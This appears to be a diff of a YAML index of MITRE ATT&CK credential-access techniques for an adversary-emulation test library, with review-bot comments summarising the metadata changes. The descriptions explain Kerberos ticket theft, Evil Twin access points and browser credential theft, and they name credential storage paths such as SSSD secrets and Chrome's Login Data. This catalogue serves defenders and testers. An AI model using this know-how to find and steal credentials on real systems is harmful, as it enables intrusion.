+ id: attack-pattern--3986e7fd-a8e9-4ecb-bfc6-55920855912b
+ created: '2020-08-24T13:43:00.028Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1558/004
+ external_id: T1558.004
+ - source_name: Microsoft Detecting Kerberoasting Feb 2018
+ description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
+ using Azure Security Center. Retrieved March 23, 2018.
+ url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
+ - source_name: Harmj0y Roasting AS-REPs Jan 2017
+ description: HarmJ0y. (2017, January 17). Roasting AS-REPs. Retrieved September
+ 23, 2024.
+ url: https://blog.harmj0y.net/activedirectory/roasting-as-reps/
+ - source_name: Stealthbits Cracking AS-REP Roasting Jun 2019
+ description: Jeff Warren. (2019, June 27). Cracking Active Directory Passwords
+ with AS-REP Roasting. Retrieved August 24, 2020.
+ url: https://blog.stealthbits.com/cracking-active-directory-passwords-with-as-rep-roasting/
+ - source_name: SANS Attacking Kerberos Nov 2014
+ description: Medin, T. (2014, November). Attacking Kerberos - Kicking the
+ Guard Dog of Hades. Retrieved March 22, 2018.
+ url: https://redsiege.com/kerberoast-slides
+ - source_name: AdSecurity Cracking Kerberos Dec 2015
+ description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
+ Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
+ Domain. Retrieved March 22, 2018.
+ url: https://adsecurity.org/?p=2293
+ - source_name: Microsoft 4768 TGT 2017
+ description: 'Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication
+ ticket (TGT) was requested. Retrieved August 24, 2020.'
+ url: https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4768
+ - source_name: Microsoft Kerberos Preauth 2014
+ description: 'Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why
+ It Should Not Be Disabled. Retrieved August 25, 2020.'
+ url: https://social.technet.microsoft.com/wiki/contents/articles/23559.kerberos-pre-authentication-why-it-should-not-be-disabled.aspx
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1558.004
atomic_tests:
- name: Rubeus asreproast
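Review bot: three real changes are buried inside this re-emitted block and are easy to miss among the reordering: the Harmj0y reference moves from `http://www.harmj0y.net/blog/activedirectory/roasting-as-reps/` to `https://blog.harmj0y.net/activedirectory/roasting-as-reps/` with a new retrieval date, `x_mitre_version` goes from 1.0 to 1.1, and `x_mitre_permissions_required: User` is dropped while `x_mitre_system_requirements: Valid domain account` stays. List these in the PR description so they are reviewable without reading the whole hunk.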
@@ -91106,17 +91827,12 @@ credential-access:
name: powershell
T1558:
technique:
- modified: '2024-03-01T16:58:02.395Z'
+ modified: '2024-09-17T19:49:11.455Z'
name: Steal or Forge Kerberos Tickets
description: |
Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Adversaries may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access.
On Windows, the built-in klist
utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist)
-
- Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb
as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey
. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). The ccache file may also be converted into a Windows format using tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Citation: Brining MimiKatz to Unix)(Citation: Kekeo)
-
-
- Kerberos tickets on macOS are stored in a standard ccache format, similar to Linux. By default, access to these ccache entries is federated through the KCM daemon process via the Mach RPC protocol, which uses the caller's environment to determine access. The storage location for these ccache entries is influenced by the /etc/krb5.conf
configuration file and the KRB5CCNAME
environment variable which can specify to save them to disk or keep them protected via the KCM daemon. Users can interact with ticket storage using kinit
, klist
, ktutil
, and kcc
built-in binaries or via Apple's native Kerberos framework. Adversaries can use open source tools to interact with the ccache files directly or to use the Kerberos framework to call lower-level APIs for extracting the user's TGT or Service Tickets.(Citation: SpectorOps Bifrost Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
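Review bot: the Linux and macOS paragraphs removed here (SSSD's `/var/lib/sss/secrets/secrets.ldb` and `.secrets.mkey`, the KCM daemon, `ktutil` and `kcc`) are not carried into the new T1558.005 description earlier in this patch, which only covers `/tmp` `krb5cc_%UID%`, `krb5.ccache` and the macOS `API:{uuid}` in-memory cache. If that matches upstream, fine, but any detection notes that referenced the SSSD secrets paths via T1558 no longer have technique text to point at; call this out in the PR description.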
@@ -91152,7 +91868,7 @@ credential-access:
- Windows
- Linux
- macOS
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Logon Session: Logon Session Metadata'
@@ -91177,13 +91893,6 @@ credential-access:
description: Bani, M. (2018, February 23). Detecting Kerberoasting activity
using Azure Security Center. Retrieved March 23, 2018.
url: https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/
- - source_name: Kekeo
- description: Benjamin Delpy. (n.d.). Kekeo. Retrieved October 4, 2021.
- url: https://github.com/gentilkiwi/kekeo
- - source_name: SpectorOps Bifrost Kerberos macOS 2019
- description: Cody Thomas. (2019, November 14). When Kirbi walks the Bifrost.
- Retrieved October 6, 2021.
- url: https://posts.specterops.io/when-kirbi-walks-the-bifrost-4c727807744f
- source_name: Medium Detecting Attempts to Steal Passwords from Memory
description: French, D. (2018, October 2). Detecting Attempts to Steal Passwords
from Memory. Retrieved October 11, 2019.
@@ -91192,14 +91901,6 @@ credential-access:
description: Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket
Attacks. Retrieved February 27, 2020.
url: https://blog.stealthbits.com/detect-pass-the-ticket-attacks
- - source_name: macOS kerberos framework MIT
- description: Massachusetts Institute of Technology. (2007, October 27). Kerberos
- for Macintosh Preferences Documentation. Retrieved October 6, 2021.
- url: http://web.mit.edu/macdev/KfM/Common/Documentation/preferences.html
- - source_name: MIT ccache
- description: 'Massachusetts Institute of Technology. (n.d.). MIT Kerberos
- Documentation: Credential Cache. Retrieved October 4, 2021.'
- url: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
- source_name: AdSecurity Cracking Kerberos Dec 2015
description: Metcalf, S. (2015, December 31). Cracking Kerberos TGS Tickets
Using Kerberoast – Exploiting Kerberos to Compromise the Active Directory
@@ -91221,23 +91922,14 @@ credential-access:
description: Sean Metcalf. (2014, September 12). Kerberos, Active Directory’s
Secret Decoder Ring. Retrieved February 27, 2020.
url: https://adsecurity.org/?p=227
- - source_name: Brining MimiKatz to Unix
- description: Tim Wadhwa-Brown. (2018, November). Where 2 worlds collide Bringing
- Mimikatz et al to UNIX. Retrieved October 13, 2021.
- url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
- - source_name: Linux Kerberos Tickets
- description: Trevor Haskell. (2020, April 1). Kerberos Tickets on Linux Red
- Teams. Retrieved October 4, 2021.
- url: https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555:
technique:
- modified: '2024-02-26T14:19:09.417Z'
+ modified: '2024-10-15T14:57:46.850Z'
name: Credentials from Password Stores
description: 'Adversaries may search for common password storage locations to
obtain user credentials.(Citation: F-Secure The Dukes) Passwords are stored
@@ -91288,7 +91980,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555
atomic_tests:
- name: Extract Windows Credential Manager via VBA
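Review bot: with this hunk, all six references dropped from T1558 (Kekeo, SpectorOps Bifrost Kerberos macOS 2019, macOS kerberos framework MIT, MIT ccache, Brining MimiKatz to Unix, Linux Kerberos Tickets) correspond to citations removed from the description earlier in the patch, and the citations still in the remaining description text (ADSecurity Kerberos Ring Decoder, Microsoft Klist) are not among the removed entries, so no dangling `(Citation: ...)` keys are left. Four of the six are re-added under T1558.005; `MIT ccache` and `macOS kerberos framework MIT` are not, consistent with that description not citing them.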
@@ -91416,7 +92107,7 @@ credential-access:
name: powershell
T1552:
technique:
- modified: '2024-04-15T21:33:12.892Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Unsecured Credentials
description: 'Adversaries may search compromised systems to find and obtain
insecurely stored credentials. These credentials can be stored and/or misplaced
@@ -91428,6 +92119,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Austin Clark, @c2defense
x_mitre_deprecated: false
@@ -91442,18 +92134,18 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Application Log: Application Log Content'
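Review bot: the T1552 platform list replaces `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` (the same swap appears in T1556.007 further down). Any index, filter or test selection keyed on the old platform strings will silently stop matching these techniques, so grep the index-generation code for those three names before merging and mention the rename in the PR description. The moves of `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` into this part of the block are the same key-order churn seen elsewhere in the patch.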
@@ -91476,9 +92168,6 @@ credential-access:
url: https://labs.portcullis.co.uk/download/eu-18-Wadhwa-Brown-Where-2-worlds-collide-Bringing-Mimikatz-et-al-to-UNIX.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552
atomic_tests:
- name: AWS - Retrieve EC2 Password Data using stratus
@@ -91560,32 +92249,113 @@ credential-access:
'
name: powershell
elevation_required: true
+ T1557.004:
+ technique:
+ modified: '2024-11-11T18:52:53.686Z'
+ name: Evil Twin
+ description: "Adversaries may host seemingly genuine Wi-Fi access points to
+ deceive users into connecting to malicious networks as a way of supporting
+ follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+ [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+ or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+ ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+ network, fraudulent Wi-Fi access points may trick devices or users into connecting
+ to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+ evil twin) Adversaries may provide a stronger signal strength or block access
+ to Wi-Fi access points to coerce or entice victim devices into connecting
+ to malicious networks.(Citation: specter ops evil twin) A Wi-Fi Pineapple
+ – a network security auditing and penetration testing tool – may be deployed
+ in Evil Twin attacks for ease of use and broader range. Custom certificates
+ may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+ may also listen for client devices sending probe requests for known or previously
+ connected networks (Preferred Network Lists or PNLs). When a malicious access
+ point receives a probe request, adversaries can respond with the same SSID
+ to imitate the trusted, known network.(Citation: specter ops evil twin) Victim
+ devices are led to believe the responding access point is from their PNL and
+ initiate a connection to the fraudulent network.\n\nUpon logging into the
+ malicious Wi-Fi access point, a user may be directed to a fake login page
+ or captive portal webpage to capture the victim’s credentials. Once a user
+ is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+ network activity, manipulate data, or steal additional credentials. Locations
+ with high concentrations of public Wi-Fi access, such as airports, coffee
+ shops, or libraries, may be targets for adversaries to set up illegitimate
+ Wi-Fi access points. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ - kill_chain_name: mitre-attack
+ phase_name: collection
+ x_mitre_contributors:
+ - Menachem Goldstein
+ - DeFord L. Smith
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Traffic Flow'
+ type: attack-pattern
+ id: attack-pattern--48b836c6-e4ca-435a-82a3-29c03e5b492e
+ created: '2024-09-17T14:27:40.947Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1557/004
+ external_id: T1557.004
+ - source_name: Kaspersky evil twin
+ description: AO Kaspersky Lab. (n.d.). Evil twin attacks and how to prevent
+ them. Retrieved September 17, 2024.
+ url: https://usa.kaspersky.com/resource-center/preemptive-safety/evil-twin-attacks
+ - source_name: medium evil twin
+ description: Gihan, Kavishka. (2021, August 8). Wireless Security— Evil Twin
+ Attack. Retrieved September 17, 2024.
+ url: https://kavigihan.medium.com/wireless-security-evil-twin-attack-d3842f4aef59
+ - source_name: specter ops evil twin
+ description: Ryan, Gabriel. (2019, October 28). Modern Wireless Tradecraft
+ Pt I — Basic Rogue AP Theory — Evil Twin and Karma Attacks. Retrieved September
+ 17, 2024.
+ url: https://posts.specterops.io/modern-wireless-attacks-pt-i-basic-rogue-ap-theory-evil-twin-and-karma-attacks-35a8571550ee
+ - source_name: Australia ‘Evil Twin’
+ description: Toulas, Bill. (2024, July 1). Australian charged for ‘Evil Twin’
+ WiFi attack on plane. Retrieved September 17, 2024.
+ url: https://www.bleepingcomputer.com/news/security/australian-charged-for-evil-twin-wifi-attack-on-plane/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
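Review bot: the Azure AD to Entra ID rename is applied to prose only; the `(Citation: Azure AD Hybrid Identity)`, `(Citation: Azure AD Connect for Read Teamers)` and `(Citation: AADInternals Azure AD On-Prem to Cloud)` keys and the `AzureADConnectAuthenticationAgentService` process name are correctly left untouched, since renaming those would break citation lookup and the real service name. The new T1557.004 (Evil Twin) block, like T1558.005, arrives with `x_mitre_detection: ''` and `atomic_tests: []`, and its description carries an upstream typo ('the adversary may able to monitor'); leave that as-is here so the text stays in sync with the source and fix it upstream.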
@@ -91593,9 +92363,9 @@ credential-access:
any set of claims, thereby bypassing multi-factor authentication and defined
AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
to modify the hybrid identity authentication process from the cloud. For example,
- adversaries who compromise a Global Administrator account in an Azure AD tenant
+ adversaries who compromise a Global Administrator account in an Entra ID tenant
may be able to register a new PTA agent via the web console, similarly allowing
- them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+ them to harvest credentials and log into the Entra ID environment as any user.(Citation:
Mandiant Azure AD Backdoors)"
kill_chain_phases:
- kill_chain_name: mitre-attack
@@ -91604,21 +92374,22 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- SaaS
- - Google Workspace
- - Office 365
- IaaS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Praetorian
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -91658,55 +92429,10 @@ credential-access:
url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1555.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ryan Benson, Exabeam
- - Barry Shteiman, Exabeam
- - Sylvain Gil, Exabeam
- - RedHuntLabs, @redhuntlabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
- type: attack-pattern
- created: '2020-02-12T18:57:36.041Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1555.003
- url: https://attack.mitre.org/techniques/T1555/003
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Microsoft CryptUnprotectData April 2018
- url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
- description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
- June 18, 2019.
- - source_name: Proofpoint Vega Credential Stealer May 2018
- url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
- description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
- in targeted campaign . Retrieved June 18, 2019.
- - source_name: FireEye HawkEye Malware July 2017
- url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
- description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
- Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
- 2019.
- - source_name: GitHub Mimikittenz July 2016
- url: https://github.com/putterpanda/mimikittenz
- description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
- Retrieved June 20, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-15T14:13:45.294Z'
name: 'Credentials from Password Stores: Credentials from Web Browsers'
description: "Adversaries may acquire credentials from web browsers by reading
files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
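Review bot: `spec_version: '2.1'` is deleted at the `- spec_version: '2.1'` line with no replacement, and the same field is stripped from every other technique object in this diff; that is the STIX 2.1 object-level field rather than an ATT&CK `x_mitre_*` extension, so confirm the regeneration tooling intentionally omits it and that no consumer validates these technique blocks as STIX objects. The large deletion below it for T1555.003 (platforms, domains, contributors, `external_references`, `modified`) is re-emitted later in the same object in a different key order, so content is preserved and only ordering changes.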
@@ -91736,6 +92462,12 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ryan Benson, Exabeam
+ - Barry Shteiman, Exabeam
+ - Sylvain Gil, Exabeam
+ - RedHuntLabs, @redhuntlabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Identify web browser files that contain credentials such
as Google Chrome’s Login Data database file: AppData\Local\Google\Chrome\User
Data\Default\Login Data
. Monitor file read events of web browser files
@@ -91745,18 +92477,53 @@ credential-access:
reading web browser process memory, utilizing regular expressions, and those
that contain numerous keywords for common web applications (Gmail, Twitter,
Office365, etc.).'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Access'
- 'File: File Access'
- 'Process: OS API Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+ created: '2020-02-12T18:57:36.041Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/003
+ external_id: T1555.003
+ - source_name: GitHub Mimikittenz July 2016
+ description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+ Retrieved June 20, 2019.
+ url: https://github.com/putterpanda/mimikittenz
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Microsoft CryptUnprotectData April 2018
+ description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+ June 18, 2019.
+ url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+ - source_name: Proofpoint Vega Credential Stealer May 2018
+ description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+ in targeted campaign . Retrieved June 18, 2019.
+ url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+ - source_name: FireEye HawkEye Malware July 2017
+ description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+ Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+ 2019.
+ url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1555.003
atomic_tests:
- name: Run Chrome-password Collector
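Review bot: `x_mitre_permissions_required: [User]` is removed for T1555.003 (the `- x_mitre_permissions_required:` / `- - User` lines) and not replaced; the same removal recurs for T1552.003 and T1552.006 further down while T1558.001 keeps the field, so any reader of that key (for example a cross-check against an atomic test's `elevation_required`) now has to handle it being absent on some techniques and present on others. The reordering of `external_references` (Mimikittenz now listed before Talos Olympic Destroyer) changes no citation content, since the description's `(Citation: ...)` markers resolve by `source_name`, not by position.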
@@ -92365,7 +93132,7 @@ credential-access:
'
T1557.003:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-09-12T19:46:04.759Z'
name: DHCP Spoofing
description: "Adversaries may redirect network traffic to adversary-owned systems
by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -92402,23 +93169,23 @@ credential-access:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: collection
+ x_mitre_contributors:
+ - Alex Spivakovsky, Pentera
+ - Andrew Allen, @whitehat_zero
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
specify that the IP allocations are low or have run out; these EIDs may indicate
a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- Windows
- macOS
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
x_mitre_version: '1.1'
- x_mitre_contributors:
- - Alex Spivakovsky, Pentera
- - Andrew Allen, @whitehat_zero
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Application Log: Application Log Content'
@@ -92451,21 +93218,20 @@ credential-access:
- source_name: solution_monitor_dhcp_scopes
description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
- March 7, 2022.'
- url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+ September 12, 2024.'
+ url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
- source_name: w32.tidserv.g
description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
14, 2022.
url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1552.004:
technique:
- modified: '2023-04-12T23:52:08.194Z'
+ modified: '2024-10-04T11:31:56.622Z'
name: 'Unsecured Credentials: Private Keys'
description: "Adversaries may search for private key certificate files on compromised
systems for insecurely stored credentials. Private cryptographic keys and
@@ -92476,7 +93242,7 @@ credential-access:
as ~/.ssh
for SSH keys on * nix-based systems or C:\Users\(username)\.ssh\
on Windows. Adversary tools may also search compromised systems for file extensions
relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
- Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+ Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
device key and a transport key are generated and used to verify the device’s
identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -92510,7 +93276,7 @@ credential-access:
- macOS
- Windows
- Network
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Access'
@@ -92538,7 +93304,7 @@ credential-access:
- source_name: Kaspersky Careto
description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
Masked APT. Retrieved July 5, 2017.
